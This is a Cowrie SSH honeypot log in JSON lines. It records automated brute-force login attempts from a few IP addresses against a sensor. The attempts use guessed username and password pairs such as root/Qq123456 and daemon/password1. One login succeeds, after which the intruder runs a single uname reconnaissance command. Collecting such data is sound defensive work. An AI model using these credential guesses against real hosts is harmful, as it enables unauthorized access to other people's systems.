{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:40.049252Z","src_ip":"212.227.125.160","session":"59bb6aeb1f4c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:40.050390Z","src_ip":"212.227.125.160","session":"59bb6aeb1f4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46594,"dst_ip":"1.2.3.4","dst_port":22,"session":"76618a8eb1f2","protocol":"ssh","message":"New connection: 212.227.125.160:46594 (1.2.3.4:22) [session: 76618a8eb1f2]","sensor":"my-vps","timestamp":"2025-08-31T00:47:49.700692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:47:49.701598Z","src_ip":"212.227.125.160","session":"76618a8eb1f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:47:49.774872Z","src_ip":"212.227.125.160","session":"76618a8eb1f2"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-31T00:47:50.062773Z","src_ip":"212.227.125.160","session":"76618a8eb1f2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:51.208404Z","src_ip":"212.227.125.160","session":"76618a8eb1f2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58974,"dst_ip":"1.2.3.4","dst_port":22,"session":"45a6101fd584","protocol":"ssh","message":"New connection: 217.72.205.35:58974 (1.2.3.4:22) [session: 45a6101fd584]","sensor":"my-vps","timestamp":"2025-08-31T00:47:59.932190Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:47:59.933421Z","src_ip":"217.72.205.35","session":"45a6101fd584"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47142,"dst_ip":"1.2.3.4","dst_port":22,"session":"48507a37b21a","protocol":"ssh","message":"New connection: 212.227.125.160:47142 (1.2.3.4:22) [session: 48507a37b21a]","sensor":"my-vps","timestamp":"2025-08-31T00:48:00.147902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:48:00.149368Z","src_ip":"212.227.125.160","session":"48507a37b21a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:48:00.224405Z","src_ip":"212.227.125.160","session":"48507a37b21a"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-31T00:48:00.448972Z","src_ip":"212.227.125.160","session":"48507a37b21a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:01.603452Z","src_ip":"212.227.125.160","session":"48507a37b21a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42288,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcf7a1d5300c","protocol":"ssh","message":"New connection: 212.227.235.229:42288 (1.2.3.4:22) [session: fcf7a1d5300c]","sensor":"my-vps","timestamp":"2025-08-31T00:48:02.670235Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51380,"dst_ip":"1.2.3.4","dst_port":22,"session":"efed2059e29a","protocol":"ssh","message":"New connection: 212.227.235.229:51380 (1.2.3.4:22) [session: efed2059e29a]","sensor":"my-vps","timestamp":"2025-08-31T00:48:02.963636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:48:02.964621Z","src_ip":"212.227.235.229","session":"efed2059e29a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:48:03.032997Z","src_ip":"212.227.235.229","session":"efed2059e29a"}
{"eventid":"cowrie.login.failed","username":"tu","password":"tu123","message":"login attempt [tu/tu123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:48:03.344090Z","src_ip":"212.227.235.229","session":"efed2059e29a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:04.418142Z","src_ip":"212.227.235.229","session":"efed2059e29a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:48:04.652585Z","src_ip":"212.227.235.229","session":"fcf7a1d5300c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:48:04.653469Z","src_ip":"212.227.235.229","session":"fcf7a1d5300c"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"password1","message":"login attempt [daemon/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:48:10.172969Z","src_ip":"212.227.235.229","session":"fcf7a1d5300c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47272,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f8d2d5ce6e0","protocol":"ssh","message":"New connection: 212.227.125.160:47272 (1.2.3.4:22) [session: 5f8d2d5ce6e0]","sensor":"my-vps","timestamp":"2025-08-31T00:48:10.568429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:48:10.569353Z","src_ip":"212.227.125.160","session":"5f8d2d5ce6e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:48:10.642275Z","src_ip":"212.227.125.160","session":"5f8d2d5ce6e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:48:10.862491Z","src_ip":"212.227.125.160","session":"5f8d2d5ce6e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:48:11.190619Z","src_ip":"212.227.125.160","session":"5f8d2d5ce6e0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:48:11.191370Z","src_ip":"212.227.125.160","session":"5f8d2d5ce6e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:11.265989Z","src_ip":"212.227.125.160","session":"5f8d2d5ce6e0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:11.267086Z","src_ip":"212.227.125.160","session":"5f8d2d5ce6e0"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:12.223778Z","src_ip":"212.227.235.229","session":"fcf7a1d5300c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57136,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e5550f5986d","protocol":"ssh","message":"New connection: 212.227.235.229:57136 (1.2.3.4:22) [session: 2e5550f5986d]","sensor":"my-vps","timestamp":"2025-08-31T00:48:19.502698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:48:19.506357Z","src_ip":"212.227.235.229","session":"2e5550f5986d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:48:19.749633Z","src_ip":"212.227.235.229","session":"2e5550f5986d"}
{"eventid":"cowrie.login.failed","username":"ops","password":"1","message":"login attempt [ops/1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:48:20.699785Z","src_ip":"212.227.235.229","session":"2e5550f5986d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60258,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c3fef98edea","protocol":"ssh","message":"New connection: 212.227.125.160:60258 (1.2.3.4:22) [session: 5c3fef98edea]","sensor":"my-vps","timestamp":"2025-08-31T00:48:21.026399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:48:21.027285Z","src_ip":"212.227.125.160","session":"5c3fef98edea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:48:21.101360Z","src_ip":"212.227.125.160","session":"5c3fef98edea"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-31T00:48:21.327764Z","src_ip":"212.227.125.160","session":"5c3fef98edea"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:21.947660Z","src_ip":"212.227.235.229","session":"2e5550f5986d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:22.486722Z","src_ip":"212.227.125.160","session":"5c3fef98edea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33178,"dst_ip":"1.2.3.4","dst_port":22,"session":"e335f3dd146f","protocol":"ssh","message":"New connection: 212.227.125.160:33178 (1.2.3.4:22) [session: e335f3dd146f]","sensor":"my-vps","timestamp":"2025-08-31T00:48:24.331437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:48:24.491317Z","src_ip":"212.227.125.160","session":"e335f3dd146f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:48:24.492083Z","src_ip":"212.227.125.160","session":"e335f3dd146f"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"password1","message":"login attempt [daemon/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:48:25.665806Z","src_ip":"212.227.125.160","session":"e335f3dd146f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:48:27.276043Z","src_ip":"212.227.125.160","session":"e335f3dd146f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45926,"dst_ip":"1.2.3.4","dst_port":22,"session":"68fbfa6cb684","protocol":"ssh","message":"New connection: 212.227.235.229:45926 (1.2.3.4:22) [session: 68fbfa6cb684]","sensor":"my-vps","timestamp":"2025-08-31T00:48:31.312180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:48:31.313107Z","src_ip":"212.227.235.229","session":"68fbfa6cb684"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52310,"dst_ip":"1.2.3.4","dst_port":22,"session":"4889c67a340b","protocol":"ssh","message":"New connection: 212.227.125.160:52310 (1.2.3.4:22) [session: 4889c67a340b]","sensor":"my-vps","timestamp":"2025-08-31T00:48:31.421220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:48:31.421916Z","src_ip":"212.227.125.160","session":"4889c67a340b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:48:31.495941Z","src_ip":"212.227.125.160","session":"4889c67a340b"}
